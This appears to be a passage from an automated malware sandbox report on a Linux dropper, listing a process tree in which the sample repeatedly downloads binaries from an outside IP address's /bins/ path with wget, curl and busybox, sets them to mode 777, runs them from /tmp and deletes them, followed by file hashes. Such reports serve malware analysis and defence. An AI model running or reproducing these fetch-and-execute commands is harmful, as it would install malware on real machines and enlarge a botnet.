/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:954
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:960
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:966
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:972
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:978
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:984
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:990
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:993
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97